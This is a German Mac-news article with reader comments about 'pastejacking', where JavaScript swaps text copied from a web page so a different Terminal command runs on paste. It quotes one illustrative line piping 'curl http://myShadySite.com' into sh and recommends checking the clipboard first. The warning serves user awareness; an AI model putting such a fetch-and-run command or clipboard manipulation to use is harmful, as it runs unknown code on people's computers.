Mac-Tipp: Vorsicht bei Copy & Paste in der Terminal-App – Sorglosigkeit kann gefährlich sein

So ziemlich jeder Mac-Besitzer dürfte im Lauf der Jahre irgendwann einmal die Terminal-App genutzt haben, etwa um eine Systemeinstellung vorzunehmen oder einen Fehler zu beheben. Die Kommandozeile des unter der Oberfläche von macOS arbeitenden Unix-Systems bietet äußerst mächtige Befehle, deren Anwendung allerdings gute Systemkenntnisse erfordert. Weniger versierte Anwender greifen daher gern auf Anleitungen und vorgefertigte Anweisungen zurück, welche in großer Zahl im Internet zu finden sind.


Copy & Paste kann gefährlich sein
Die in Foren oder auf Support-Webseiten zu findenden Terminal-Befehle lassen sich einfach per Copy & Paste in die Kommandozeile übertragen. Dabei ist allerdings Vorsicht geboten, denn nicht in jedem Fall landet die im Browser angezeigte Anweisung auch tatsächlich in der Zwischenablage. Angreifer (oder Witzbolde) können nämlich mithilfe von JavaScript auf einfache Art und Weise den Kopiervorgang manipulieren und so im schlimmsten Fall sogar Daten abgreifen oder Schadcode einschleusen.

Befehl wird sofort nach dem Einfügen ausgeführt
Eine - natürlich harmlose – Demonstration dieses potenziell gefährlichen Verfahrens hat jetzt der US-amerikanische Informatikstudent Brian C. Tracy auf seinen Internetseiten veröffentlicht. Unter der Überschrift "Don't Copy Paste Into A Shell" ist dort ein einfacher Befehl für die Kommandozeile zu finden, der sich durch Markieren und Kopieren in die Zwischenablage übertragen lässt. Durch den im Quelltext der Seite enthaltenen JavaScript-Code landet allerdings nicht der angezeigte Text $ echo "looks safe to me!" im Speicher, sondern eine gänzlich andere Anweisung: echo "this could have been [curl http://myShadySite.com | sh]". Diese enthält zudem am Ende einen Wagenrücklauf, sodass der Befehl unmittelbar nach dem Einfügen ins Terminal ausgeführt wird. Der Nutzer hat somit keine Möglichkeit, ins Geschehen einzugreifen.

Manipulation ist zunächst nicht sichtbar
Tracy hat auf seiner Webseite auch den JavaScript-Code veröffentlicht, welcher die Zwischenablage manipuliert. Dieser besteht im Kern aus lediglich einer einzigen Anweisung und funktioniert auf allen Desktop-Betriebssystemen, aber auch auf iOS und iPadOS. Die während des Kopiervorgangs erfolgende Veränderung des Inhalts ist zunächst nicht sichtbar und manifestiert sich erst beim Einfügen. Mit dem Verfahren lassen sich naturgemäß nicht nur Terminal-Befehle manipulieren, auch alle anderen Inhalte wie etwa URLs können verfälscht werden. Nutzer können sich allerdings mit einer einfachen Maßnahme schützen, indem sie die Zwischenablage zunächst in einen Editor einfügen und dann den Inhalt mit dem auf der Webseite angezeigten Text vergleichen.

Kommentare

Häkelmeister20.10.20 12:42
Oldie but goldie 🙂

Aber gut das es immer mal wieder erwähnt wird 👍🏽
+8
thomas b.
thomas b.20.10.20 13:02
Für User, die sich mit der Shell nicht wirklich auskennen, sind kopierte Terminalbefehle für vermeintlich harmlose kleine Lifehacks aus dem Internet ohnehin ein Risiko, da kann einer ja fast offen Schad-Befehle mit einbauen, ohne dass der Nutzer sie überhaupt erkennt.
+10
Rosember20.10.20 14:09
"Wagenrücklauf" - 😍
+6
tranquillity
tranquillity20.10.20 14:40
Beim Einfügen sieht man den ausführlichen Text. Aber ja, der Wagenrücklauf ( ) macht die Sache dann gefährlich.
+3
Lyhoo
Lyhoo20.10.20 16:03
Prüfen der Zwischenablage ist einfach: Finder Bearbeiten Zwischenablage einblenden.

Außerdem lese ich immer die man-Seite im Terminal bevor ich einen mir unbekannten Befehl eingebe. (Im o.g. Beispiel 'man echo' im Terminal eingeben. Zum Beenden von man nur 'q' drücken)
+7
andif820.10.20 16:40
@Lythoo: Ganz praktischer Tipp! Wusst' ich noch nicht... 1000-Dank!
+2
Colonel Panic
Colonel Panic20.10.20 17:33
Es ist kein Wagenrücklauf (\r), sondern ein Zeilenvorschub (\n).

Unter Firefox scheint der Exploit übrigens nicht zu funktionieren, bekomme hier "looks safe to me" ins Clipboard kopiert.
+1
iMackerer21.10.20 08:11
Bei mir tritt es auch in Firefox auf (Mac-Version)

Guter Tipp!
0
DTP
DTP21.10.20 11:34
Guter Tipp.

Ich nutze immer Alfred um mir die Inhalte der Zwischenablage anzusehen.
0

Kommentieren

Sie müssen sich einloggen, um die News kommentieren zu können.